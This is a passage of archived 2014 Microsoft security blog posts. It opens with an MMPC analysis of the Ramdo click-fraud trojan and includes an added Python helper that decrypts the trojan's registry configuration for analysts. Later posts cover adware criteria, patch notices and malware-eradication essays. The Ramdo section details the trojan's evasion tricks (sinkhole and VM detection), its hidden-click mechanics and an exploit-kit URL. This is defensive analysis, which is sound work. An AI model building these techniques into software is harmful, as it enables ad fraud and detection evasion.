Depending on the variant, one of the following registry values is used to store configuration related to the command and control (C&amp;C) component (for example, the bot version, or the seed to generate the&nbsp;C&amp;C domain):</p> <ul> <li><em>HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM\tLast_ReadedSpec</em></li> <li><em>HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM\iTestPropulsion</em></li> </ul> <p>Also depending on the variants, one of the&nbsp;following values is used to store configuration related to click-fraud (for example, the click interval, which websites to click, or the user-agent string):</p> <ul> <li> <div><em>HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM\tLastCollab_doc</em></div> </li> <li> <div><em>HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM\iTestShears</em></div> </li> </ul> <p>The RC4 key used in the decryption of data received from the C&amp;C, and the configuration stored in the registry, is generated in this way:</p> <ul> <li> <div><em>ReadRegStringValue(&ldquo;HKLM\Software\Microsoft\Cryptography\MachineGuid&rdquo;) + &ldquo;iU&rdquo;</em></div> </li> </ul> <p>The key is sent to the C&amp;C along with the&nbsp;following information about the infected PC in the initial phone-home request:</p> <ul> <li>Operating system version.</li> <li>Whether the machine is running in a virtualization environment (Hyper-V, VMWARE, VirtualBox).</li> <li>The installed Flash Player version.</li> <li>The number of processors.</li> <li>The RC4 key to decrypt response.</li> </ul> <p>The request sent to the C&amp;C is encrypted with another embedded public key (it can be imported with the CryptImportKey API).&nbsp; A recent example extracted (base64 encoded) is:</p> <ul> <li><em>BgIAAACkAABSU0ExAAQAAAEAAQDJ9Nl4XvlyD9PmguEaeUt2auCZm2994FcdY2aCGMuYvc71sqLkOyf3Q1Cp4q/s3CXgXr5ifomWiF4D22eWsEPqoI1RyZ8LwYaCVD11WrwtoST4BPwMPARLvNJGvAKzcXpn1adDvprXsfGW1r3YeKPw6KZLPdCfvLBl3U9xTJ8lrg==</em></li> </ul> <p>The C&amp;C domain is generated by a Domain Generation Algorithm (DGA) that avoids 
storing the C&amp;C domain as plain text. However, unlike other DGAs that use the date/time as a seed, Ramdo uses a fixed seed value that is initially embedded in the executable but can be updated by the C&amp;C server later. The DGA can be written in C# like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo2.png"><img width="500" alt="DGA" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo2.png" border="0" /></a>&nbsp;</p> <em>Figure 2: Ramdo uses a DGA to generate the C&amp;C domain</em> <p>With this code, seed value <em>0x90002B44C </em>can generate the domain <em>ceigqweqwaywiqgu.org.</em></p> <h3>Click-fraud</h3> <p>To do click-fraud, Win32/Ramdo starts one or more new instances of one of the following system processes:</p> <ul> <li> <div><em>iexplore.exe</em></div> </li> <li> <div><em>twunk_32.exe</em></div> </li> <li> <div><em>winhlp32.exe</em></div> </li> </ul> <p>It injects the payload DLL there to start hidden clicks. The click websites are first returned from the C&amp;C and then stored in the registry as mentioned above.&nbsp; After RC4 decryption, the configuration may look like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo3.png"><img style="width:1200px;height:22px;" alt="RC4" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo3.png" border="0" /></a>&nbsp;</p> <em>Figure 3: The click websites&nbsp;stored in the registry after RC4 decryption - where <em>searchliiter.com </em>and <em>searchwander.com </em>are the websites to start clicking with</em><br /> <p>Like many click-fraud bots, Ramdo creates a WebBrowser control with CLSID {8856f961-340a-11d0-a96b-00c04fd705a2}, parses through the HTML content retrieved, and follows the hrefs found in the document to simulate human clicks. 
The exception for Ramdo is that it will skip an href if it contains any of the following strings:</p> <ul> <li><em>.pdf</em></li> <li><em>.xml</em></li> <li><em>/contact</em></li> <li><em>/faq</em></li> <li><em>/feed</em></li> <li><em>/flagcontent</em></li> <li><em>/forgotpassword</em></li> <li><em>/login</em></li> <li><em>/password</em></li> <li><em>/register</em></li> <li><em>/rss</em></li> <li><em>/terms</em></li> <li><em>/tweet</em></li> <li><em>action=embed-flash</em></li> <li><em>javascript:</em></li> <li><em>mailto:</em></li> <li><em>registration</em></li> </ul> <p>It makes sense that Ramdo wants to avoid clicking on links containing these strings, as they are likely not related to advertisements and can be very noisy. The clicks are all done in the background, to make sure users won&rsquo;t notice them.</p> <p>Ramdo also hooks the following APIs:</p> <ul> <li> <div><em>CoCreateInstance</em></div> </li> <li> <div><em>DialogBoxIndirectParamAorW</em></div> </li> <li> <div><em>waveOutOpen</em></div> </li> <li> <div><em>waveOutSetVolume</em></div> </li> </ul> <p>It also disables sounds, popup dialog/message boxes, and file download dialogs by changing their behaviors inside the click process.</p> <p>When loaded in a web browser, one of the clicked websites can look like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo4.png"><img width="500" alt="sponsored links" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo4.png" border="0" /></a>&nbsp;</p> <em>Figure 4: An example of a web page showing the &quot;sponsored links&quot; clicked by Ramdo</em> <p>It is also interesting to note that the traffic was sold to exploit kit owners, and one of the clicks was redirected to <em>sketch.texture.victimizedppxv.org/praising.php</em>, which loaded exploits targeting Adobe Flash Player.</p> <h3>Antisecurity measures</h3> <p>Ramdo&rsquo;s authors put in a lot of effort to&nbsp;make analysis more difficult. 
As well as common tricks like dynamically resolving APIs and decrypting strings to make reverse engineering harder, Ramdo also checks if it&rsquo;s running under a&nbsp;virtualization guest OS and sends that information to the C&amp;C. If virtualization is detected, instead of the bot exiting immediately, the C&amp;C server responds with error 404 or 502.&nbsp;The bot keeps running, so it looks as if the C&amp;C is simply unavailable, although nothing is wrong on the bot side.</p> <p>Another trick the authors included is that the trojan tries to detect whether its C&amp;C servers have been sinkholed or redirected. Look at this function:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo5.png"><img width="500" alt="Check C&amp;C" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo5.png" border="0" /></a>&nbsp;</p> <em>Figure 5: Ramdo tries to detect whether&nbsp;its C&amp;C servers have been sinkholed or redirected</em> <p>It&rsquo;s called right before sending a request to the C&amp;C server. The &quot;Cnc&quot; parameter contains the DGA-generated domain; it is first resolved to an IP address, and then Ramdo calls <em>gethostbyaddr </em>to do a reverse DNS lookup on the resolved IP to get the actual host name. It checks for one of these strings:</p> <ul> <li><em>sinkhole</em></li> <li><em>malware</em></li> <li><em>suspended</em></li> </ul> <p>If the host name contains one of these strings, the request will not be sent to the C&amp;C, in an attempt to avoid server-side analysis. We can only assume the author expects Ramdo to survive a takedown with this method.</p> <h3>Final words</h3> <p>Ramdo has simple functionality but uses many techniques that make analysis harder. Despite the efforts of the malware author to avoid detection, the MSRT is ready to clean it up. 
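</p> <p>The post states that Ramdo keeps its configuration in RC4-encrypted registry values (the value names listed under Payload) and derives the RC4 key from the MachineGuid registry string with "iU" appended. The following is an added example for this page, not MMPC code, showing how an analyst would recover that configuration from an exported hive: RC4 is implemented inline, the key is derived as described, and the known value names are decrypted. It assumes the key bytes are the ASCII form of the GUID string and that the decrypted blob is text; the registry content and GUID below are constructed, and the plaintext layout is illustrative (the domains are those in Figure 3, the seed is the post's example seed).</p>

```python
"""Recover Win32/Ramdo's RC4-encrypted registry configuration (analyst helper).

Added example, not MMPC code. It applies what the post states: the config
lives in RC4-encrypted registry values under the Adobe keys, and the RC4 key
is the string read from HKLM\\Software\\Microsoft\\Cryptography\\MachineGuid
with "iU" appended. Assumptions of this example: the key bytes are the ASCII
form of that string, and the decrypted blob is text.
"""

# Registry value names the post lists, mapped to the configuration they hold.
RAMDO_CONFIG_VALUES = {
    "tLast_ReadedSpec": "cnc",         # HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM
    "iTestPropulsion": "cnc",          # HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM
    "tLastCollab_doc": "clickfraud",   # HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM
    "iTestShears": "clickfraud",       # HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM
}


def derive_ramdo_key(machine_guid):
    """Key scheme from the post: MachineGuid + "iU" (ASCII encoding assumed)."""
    return (machine_guid + "iU").encode("ascii")


def rc4_crypt(key, data):
    """Plain RC4: key scheduling, then XOR with the keystream. Symmetric, so
    the same call encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_ramdo_config(registry_values, machine_guid):
    """registry_values: {value name: raw bytes} exported from the infected
    user's hive. Returns {value name: (kind, decrypted text)} for the value
    names Ramdo is known to use; other values are ignored."""
    key = derive_ramdo_key(machine_guid)
    recovered = {}
    for name, blob in registry_values.items():
        kind = RAMDO_CONFIG_VALUES.get(name)
        if kind is None:
            continue
        recovered[name] = (kind, rc4_crypt(key, blob).decode("latin-1"))
    return recovered


# Constructed sample hive content, not a real infection artifact: the GUID is
# made up, and the plaintext layout is illustrative only.
SAMPLE_MACHINE_GUID = "12345678-abcd-4ef0-9a8b-0123456789ab"
SAMPLE_KEY = derive_ramdo_key(SAMPLE_MACHINE_GUID)
SAMPLE_REGISTRY = {
    "iTestShears": rc4_crypt(SAMPLE_KEY, b"searchliiter.com|searchwander.com"),
    "iTestPropulsion": rc4_crypt(SAMPLE_KEY, b"seed=0x90002B44C"),
    "UnrelatedValue": b"\x00\x01\x02",
}

if __name__ == "__main__":
    for name, (kind, text) in extract_ramdo_config(SAMPLE_REGISTRY, SAMPLE_MACHINE_GUID).items():
        print("%-16s %-10s %s" % (name, kind, text))
```

<p>Because RC4 has no integrity check, a wrong MachineGuid (for example one taken from a different machine than the hive) does not fail loudly; it yields garbage bytes, so the recovered text should be sanity-checked against the expected shape before it is treated as the bot's configuration.</p> <p>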
As usual, the best protection from this and other malware and potentially unwanted software is an up-to-date, real-time security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Shawn Wang</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div> Adrienne’s View: Cloud security benefits belie pre-deployment doubtshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspxMon, 07 Apr 2014 20:46:48 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:25b2feb6-24fe-47b1-9dee-8d065f7dca96Trusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Cloud security is often better than customers expect it to be. I&rsquo;ve blogged about that trend before, including the <a target="_blank" href="/b/trustworthycomputing/archive/2013/06/11/cloud-trust-study-security-privacy-and-reliability-benefits-for-smbs-in-the-u-s.aspx">Cloud Trust Study</a> (commissioned by Microsoft and conducted by comScore) showing high percentages of small to mid-sized businesses (SMBs) seeing improved security after moving to the cloud.</p> <p>Two recent studies add further evidence that security apprehensions persist -- but prove unwarranted for many cloud customers after rolling out the cloud service.&nbsp; <a target="_blank" href="/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspx">See more &gt;&gt;</a></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspx">read more</a>)cloud 
securityAdrienne HallCloudSMBsSMBTrustcloud trust studyCloud Computingcloud servicesMicrosoftDatacomScorePrivacy Adware: A new approachhttp://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspxThu, 03 Apr 2014 20:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:e398809b-8c90-42bd-ae70-38c714970c05msft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/03/adware-a-new-approach.aspx#comments<div class="ExternalClassD02F60C1F6694AA4B3BC037B0EF737CC"> <p>Here at the Microsoft Malware Protection Center (MMPC) we understand advertising is part of the modern computing experience. However, we want to give our customers choice and control regarding what happens with their computers. To that end we have recently undergone some changes to both the criteria we use to classify a program as adware and how we remediate it when we find it. This blog will help explain the new criteria and how it affects some programs.</p> <p>Our updated <a href="http://www.microsoft.com/security/portal/mmpc/shared/objectivecriteria.aspx">objective criteria</a> also explains how advertising software can provide users with&nbsp;choice and control. Programs that do not follow these rules will be detected as adware and immediately removed from the user&rsquo;s machine:</p> <blockquote> <p><em>Programs that promote a product or service outside of their own program can interfere with your computing experience. 
You should have clear choice and control when installing programs that open advertisements.</em></p> <p><em>The advertisements that are opened by these programs must:</em></p> <ul> <li> <div><em>Include an obvious way to close the ad.</em></div> </li> <li> <div><em>Include the name of the program that created the ad.</em></div> </li> </ul> <p><em>The program that creates these advertisements must:</em></p> <ul> <li> <div><em>Provide a standard uninstall method for the program using the same name as shown in the ads it produces.</em></div> </li> </ul> </blockquote> <p>It is important that both developers and our customers understand these criteria. I will look at each of the points individually. But first, let&rsquo;s look at which programs can qualify as adware.</p> <h2>What can be classified as adware</h2> <p>We only consider classifying a program as adware if it runs on the user&rsquo;s machine and produces notifications promoting goods or services in programs other than itself. If the program shows advertisements within its own borders it will not be assessed any further.</p> <p>Many programs use advertising as a form of payment for the program and that is also an acceptable practice. We are more concerned with the advertising that interferes with our customers&rsquo; Windows experience without giving them choice and control over it. To that end, programs that produce notifications promoting goods and services in programs other than themselves must adhere to the following rules:</p> <h3>A method to close the ad</h3> <p>As part of the advertisement there must be a method to close the ad. This must be a clear and obvious method. 
Suggested methods are an &lsquo;X&rsquo; or the word &lsquo;close&rsquo; in the corner of the ad.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware1.png"><img width="500" alt="Visible ads" src="http://www.microsoft.com/security/portal/blog-images/a/adware1.png" border="0" /></a></p> <p><em>Figure 1: Our new objective criteria state that the ads must have a visible close button</em></p> <p>If you are going to have a group of ads, it is acceptable to have a single close button as long as the ads are clearly grouped together. If the ads are not grouped, each ad will need its own close button. Some of the better groupings we have seen are lines around all of the ads or a different colour background for the ads.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware2.png"><img width="500" alt="Single close" src="http://www.microsoft.com/security/portal/blog-images/a/adware2.png" border="0" /></a></p> <p><em>Figure 2: A single close button is acceptable for ads that are clearly grouped</em></p> <p>In the case of pop-up advertisements, a working close button on the window is acceptable.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware3.png"><img width="500" alt="Window close" src="http://www.microsoft.com/security/portal/blog-images/a/adware3.png" border="0" /></a></p> <p><em>Figure 3: Pop-up ads must have a working window close button</em></p> <h3>The name of the program that is creating the ad</h3> <p>It is important for the user to know that these ads are being shown by a specific program and would not be there if it were not for this program. To tell the user that your program is making the ads, you need to make it clearly known in the advertisement. For example, some of the clearer ways we see this done are phrases like &ldquo;Ads by &hellip;&rdquo;, &ldquo;&hellip; ads&rdquo;, &ldquo;Powered by &hellip;&rdquo;, &ldquo;This ad served &hellip;&rdquo;, or &ldquo;This ad is from &hellip;&rdquo;.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware4.png"><img width="500" alt="Ad identification" src="http://www.microsoft.com/security/portal/blog-images/a/adware4.png" border="0" /></a></p> <p><em>Figure 4: Our new objective criteria state that the ads must clearly mention which program is producing the ads</em></p> <p>These methods all meet our updated objective criteria by clearly informing users which program is showing the ads. Using abbreviations or company logos alone is not considered clear enough. Also, using only &ldquo;Ads not by this site&rdquo; does not meet our criteria, because the user does not know which program created the ad.</p> <h3>A way to uninstall the program that is making the ads</h3> <p>The final part of giving a user choice and control is giving them a way to uninstall the program that is making the ads. For example, candidate programs that produce independent promotion notifications, or promotion notifications in Internet Explorer, must have an uninstall entry in the Windows Control Panel. It is very important that the name of the program in the uninstall entry exactly matches the name shown in the advertisement.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/adware5.png"><img width="500" alt="uninstall entry" src="http://www.microsoft.com/security/portal/blog-images/a/adware5.png" border="0" /></a></p> <p><em>Figure 5: There must be an uninstall entry for the program producing the ads, and the name in the entry must match that on the ads</em></p> <p>We know that for some browsers, extensions are only removable through the browser&rsquo;s own controls. 
This is considered a standard uninstall method and meets our objective criteria as long as the name still matches the name in the ad.</p> <h2>What happens to detected adware</h2> <p>Currently, when our security products detect a program as adware, they alert the user and offer a recommended action. If the user does not respond, the security product lets the program run until the user makes a decision.</p> <p>With our updated objective criteria, this is going to change. Now, when one of our products detects adware, it will immediately stop the program and notify the user. The user then has the ability to restore the program if they wish.</p> <h2>When is this going to happen?</h2> <p>Changes to our objective criteria for classifying adware will come into effect on July 1, 2014. This gives developers three months to comply with the new rules.</p> <p>We have already started reassessing our current adware detections against these new criteria. If your program is still being detected as adware but meets the new criteria, you can let us know through the <a href="http://www.microsoft.com/security/portal/mmpc/vendor/resources.aspx">Developer Contact form</a>.</p> <p>We are very excited by all of these changes. We believe they will make it easy for software developers to use advertising while at the same time empowering users to control their experience.</p> <p><em>Michael Johnson</em><br /><em>MMPC</em></p> </div>
<p><strong>Advance Notification Service for the April 2014 Security Bulletin Release</strong><br />http://blogs.technet.com/b/msrc/archive/2014/04/03/advance-notification-service-for-the-april-2014-security-bulletin-release.aspx<br />Thu, 03 Apr 2014 17:00:22 GMT, Dustin C. Childs</p>
<p>Today we provide <a href="http://technet.microsoft.com/security/bulletin/MS14-apr">advance notification</a> for the release of four bulletins, two rated Critical and two rated Important in severity. These updates address issues in Microsoft Windows, Office and Internet Explorer.</p> <p>The update provided through MS14-017 fully addresses the Microsoft Word issue first described in <a href="http://technet.microsoft.com/security/advisory/2953095">Security Advisory 2953095</a>. That advisory also included a <a href="https://support.microsoft.com/kb/2953095">Fix it</a> to disable opening rich-text format (RTF) files within Microsoft Word. Once the security update is applied, you should disable the Fix it so that RTF files render normally again. At this time, we are still aware only of limited, targeted attacks directed at Microsoft Word 2010. The update will fully address all affected versions.</p> <p>This Tuesday&rsquo;s release will offer the last security updates made available for Windows XP and Office 2003. Both of these products go out of support on April 8, 2014. If you are unsure about the impact this may have on your environment, I recommend you read the recent <a href="http://blogs.technet.com/b/security/archive/2014/03/24/cyber-threats-to-windows-xp-and-guidance-for-small-businesses-and-individual-consumers.aspx">blog</a> from Trustworthy Computing&rsquo;s Tim Rains, which discusses some of the threats to Windows XP and provides guidance for small businesses and consumers.</p> <p>As per our usual process, we&rsquo;ve scheduled the security bulletin release for the second Tuesday of the month, April 8, 2014, at approximately 10:00 a.m. PDT. Revisit this blog then for analysis of the risk and impact, as well as deployment guidance, together with a brief video overview of the month&rsquo;s updates. Until then, please review the <a title="ANS summary page" href="http://technet.microsoft.com/security/bulletin/MS14-apr">ANS summary page</a> for more information to help you prepare for security bulletin testing and deployment.</p> <p>Finally, you can stay on top of the MSRC team&rsquo;s recent activities by following us on Twitter at <a title="@MSFTSecResponse" href="https://twitter.com/msftsecresponse">@MSFTSecResponse</a>.</p> <p>Thank you,<br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs">Dustin Childs</a><br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</p>
<p><strong>The Next Leap Forward in Cyber Defense: Taking Action to Help Defeat Adversaries</strong><br />http://blogs.technet.com/b/msrc/archive/2014/04/02/the-next-leap-forward-in-cyber-defense-taking-action-to-help-defeat-adversaries.aspx<br />Wed, 02 Apr 2014 16:01:31 GMT, Chris Betz</p>
<p>It is often said that attackers have an advantage, because defenders have to protect every part of their systems all the time, while the attacker only has to find one way in.</p> <p>This argument oversimplifies the security landscape and the real strength that defenders can achieve if they work together. While it&rsquo;s true that it is difficult to defend against an adversary that targets a single victim, this isn&rsquo;t the way most malicious actors work. It is easier and cheaper for malicious actors to reuse techniques, infrastructure and tools. Most malicious actors build capabilities that work across many targets, then modify and reuse them.</p> <p>This is where the industry has the most opportunity to evolve. Industry collaboration and information sharing are part of the solution, but the real key is finding a way to coordinate <i>action</i>. When an attack targeting dozens, hundreds, or thousands of systems occurs, identifying a common aspect of that attack can begin to unravel it everywhere. The fact that attackers use the same or similar methodologies in many places can actually put them at a disadvantage.</p> <p>Think of how different animals in the wild respond to attacks. Some respond as individuals and scatter in all directions. This allows predators to focus their attack on an individual and give chase. Yet this same attack unravels against animals who respond by forming a circle and standing their ground as a group. 
As long as they stick together, the predators are at a disadvantage &ndash; unable to separate and run down an individual.</p> <p>This kind of coordinated defense, and more crucially coordinated action, is the key to our industry taking the next big leap in the fight against cyber-attacks. It&rsquo;s not enough to share threat indicators such as YARA signatures, IP addresses and malware hashes. What we really want is to move defenders to take action that defends them and undermines an adversary&rsquo;s attack. As an industry, we have to come together and decide on a set of standards or principles by which we&rsquo;re going to not just share information, but use it.</p> <p>So why hasn&rsquo;t the industry moved towards actionable information sharing? In my opinion, we need to advance the current class of information sharing tools, processes, and technologies. Think of the Traffic Light Protocol (TLP). TLP tells us how sensitive a piece of information is, and whether we can share it. What it doesn&rsquo;t say is whether it&rsquo;s OK to incorporate an IP address into a network defense system, to ping the address, or to try to have the address taken down.</p> <p>As an industry, we must work to design and adopt technologies and programs that facilitate a two-way conversation and enable actionable information sharing. This should be the start of partnerships, not where things end. Our tools can no longer just be streams of after-the-fact data that flow from one place to another in varied forms and formats. Appropriate action needs to be part of the dialog, and part of us working together.</p> <p>Part of this transformation is happening today at <a href="http://technet.microsoft.com/en-us/security/dn467918">Microsoft with our Microsoft Active Protections Program (MAPP)</a>. While MAPP initially started as an information-sharing effort amongst security vendors, it&rsquo;s moving to a place where it provides a set of guidance for defenders to protect themselves. Truly evolving to the next level will mean shifting from sharing information one way to taking coordinated action. The Microsoft Malware Protection Center (MMPC) has recently talked about the concept and called for a coordinated malware eradication approach in this <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx">blog post</a>.</p> <p>When we get to that point, it won&rsquo;t just be security vendors who are working to keep everyone safe. It will be the networks, the service providers, the government entities, the retailers, the banks, all the enterprises of the world pulling together and sharing the actionable threat information necessary for defeating the adversaries &mdash; consistently and permanently.</p> <p>This will take a greater degree of trust than just information sharing. But to take that next big leap in enhancing our defense against cyber-attacks, it&rsquo;s where we must begin.</p> <p><a href="http://blogs.technet.com/b/msrc/about.aspx#Chris_Betz">Chris Betz<br /></a>Senior Director<br />Microsoft Security Response Center (MSRC)</p>
<p><strong>Creating an intelligent &ldquo;sandbox&rdquo; for coordinated malware eradication</strong><br />http://blogs.technet.com/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx<br />Mon, 31 Mar 2014 21:37:19 GMT, Trusted Cloud Team</p>
<p><strong>By TwC Staff</strong></p> <p>Antimalware companies have for some time used machine learning and big data analysis to detect and disrupt malware. 
But to move from disruption to eradication, the antimalware ecosystem must work with new types of partners in different ways. <a target="_blank" href="/b/trustworthycomputing/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx">Read more &gt;&gt;</a></p>
<p><strong>United States&rsquo; Malware Infection Rate More than Doubles in the First Half of 2013</strong><br />http://blogs.technet.com/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspx<br />Mon, 31 Mar 2014 20:47:00 GMT, Tim Rains - Microsoft</p>
<p>New data in the Microsoft Security Intelligence Report volume 15 indicates that the malware infection rate of the United States increased precipitously between the fourth quarter of 2012 and the first quarter of 2013. The <a href="http://www.microsoft.com/security/pc-security/malware-removal.aspx">Malicious Software Removal Tool</a> (MSRT) cleaned malware on 8.0 of every 1,000 computers scanned (<a href="http://www.microsoft.com/security/sir/glossary.aspx#C">Computers Cleaned per Mille or CCM</a>) in the US in the second quarter of 2013, compared to the worldwide average of 5.8 in the same quarter. This was more than double the infection rate of 3.3 in the fourth quarter of 2012, as illustrated in Figures 1 and 2. With the exception of the third quarter of 2011, the US has enjoyed infection rates consistently below the worldwide average. The infection rate in the fourth quarter of 2012 was one of the lowest CCMs recorded for the US in the history of the Microsoft Security Intelligence Report.<br /><br />The percentage of systems that encountered threats in the US during this period increased only slightly, from 13.4 percent in the fourth quarter of 2012 to 14.1 percent in the first quarter of 2013. This is well below the worldwide average encounter rate of 17.8 percent in the first quarter of 2013. The encounter rate in the US decreased in the second quarter of 2013 to 11.5 percent, despite the malware infection rate remaining relatively high. <a href="/b/security/archive/2014/03/31/united-states-malware-infection-rate-more-than-doubles-in-the-first-half-of-2013.aspx">Read more</a></p>
<p><strong>Creating an intelligent &ldquo;sandbox&rdquo; for coordinated malware eradication</strong><br />http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-sandbox-for-coordinated-malware-eradication.aspx<br />Mon, 31 Mar 2014 18:30:00 GMT, msft-mmpc</p>
<div> <p>Hello from China, where I am presenting on coordinated malware eradication at the <a href="http://www.pitci.com/2014/engs/index.html">2014 PC Security Labs Information Security Conference</a>.</p> <p>Coordinated malware eradication was also the topic of <a href="http://blogs.technet.com/b/mmpc/archive/2014/01/27/industry-needs-to-work-together-to-eradicate-malware.aspx">my last blog</a>. I said the antimalware ecosystem must begin to work with new types of partners if we are going to move from the current state of uncoordinated malware <em>disruption</em> to a state of coordinated malware <em>eradication</em>. Since then we&rsquo;ve been talking about these ideas at conferences around the world, including the recent RSA Conference in San Francisco, the Digital Crimes Consortium in Singapore, and the APCERT AGM &amp; Conference in Taipei. The level of engagement across the antimalware ecosystem has been high. Security and antivirus (AV) vendors, service providers, Computer Emergency Response Teams (CERTs), anti-fraud departments, and law enforcement have all joined the conversation, asking the essential questions about governance, communication channels, and benefits.</p> <p>The overall theme of these discussions has been how we can take the information we have and correlate it in new ways - a topic that lends itself to machine learning and big data analysis in the cloud. I believe this can be the most effective way to accelerate our malware eradication efforts. This raises the next question: how do we create an intelligent &ldquo;sandbox&rdquo; where we can do this work?</p> <p>For some time now, antimalware companies have been applying machine learning and big data analysis to generate more malware detections faster. 
Machine learning is all about training a machine to find patterns of signals in large streams of labeled information, then using those patterns against future data, all the while using feedback to continuously improve its accuracy. The stronger the labels, and the more diverse the information, the more effective the machine becomes.</p> <p>Machine learning is similar to how I see people learn. For instance, when toddlers look at animals, at first they all appear to be the same. Then they learn to distinguish dogs from cows, for example. Pretty soon they can tell poodles from retrievers too. We correct them as necessary, and over many repetitions they soon start to find more efficient identification patterns. In machine learning terms, we&rsquo;d say the toddlers were trained with labeled information. They extracted patterns of signals from the animals, and then applied these patterns to the new animals that they saw.</p> <p>Humans do this intuitively and naturally, whereas machines require complex algorithms and training against huge data sets. Currently in the antimalware business, we have three main sources of machine learning signals: voluntarily opted-in telemetry data on encountered malware threats, our analysis of the malicious files, and malware signals from our partners.</p> <p>To give you a sense of the volume and scale I am talking about, each month the Microsoft Malware Protection Center&rsquo;s (MMPC) machine learning systems analyze more than 30 million different file samples, and correlate this with what we know about the associated files, websites, and usage patterns. Our systems classify the file samples and then automatically create and deploy signatures for those identified as malware. The huge pipeline of signals makes it possible for us to quickly spot new malware. When we combine this with insights from our in-house AV researchers, our machines get smarter, and our customers receive greater protection.</p> <p>We are using machine learning advances with the cloud too. For instance, we automatically recognize files showing tell-tale patterns of malicious intent. Cloud-based machines correlate that suspicious behavior with the reputation of the particular software being used to decide whether AV software should intervene to block &ndash; faster, better, and more efficiently than a client computer could perform the check. In many cases we are able to protect clients even before detection signatures are delivered.</p> <p>Although machine learning has already contributed significantly to malware protection, I believe that complete eradication of malware families will fail unless we determine how to identify specific attackers, and how to track a given malware family&rsquo;s malicious activity across its entire lifecycle. The AV industry needs to understand how a malware family is developed and distributed, how it is controlled, how it responds to changes, and how it is monetized.</p> <p>To answer these questions, we&rsquo;ll need our machines to correlate more than telemetry, analysis, and the types of signals traditional security vendor partners provide. This is where coordinated malware eradication partnerships come into play. By working together and correlating our signals, we can see the bigger picture and identify appropriate choke points &ndash; weak spots for the malware writers.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/CME1.png"><img style="width:500px;height:312px;" alt="Coordinated Malware Eradication" src="http://www.microsoft.com/security/portal/blog-images/a/CME1.png" border="0" /></a></p> <p><em>Figure 1: The antimalware ecosystem&rsquo;s coordinated malware eradication</em></p> <p>The next question is where we will accomplish this goal. As I said above, we need a &ldquo;sandbox&rdquo; big enough that every industry partner can contribute a variety of signals and deploy their machine learning and analysis tools. On top of our telemetry and analysis data, Microsoft can also contribute large amounts of cloud-based scalable storage and computing horsepower with the necessary big data analysis tools built in. Our partners can contribute new information signals, strong labels, and their own tools to better train all of the machines.</p> <p>For example, take your typical click-fraud attack. An advertising network can see the URLs being abused, the bank accounts in use, and the websites involved. A CERT or ISP can see parts of the command and control system &ndash; URLs, files being served, domain registrars, etc. AV vendors can see the client code and the URLs it is working with. Individually, no one party has enough to identify the entirety of the attack. 
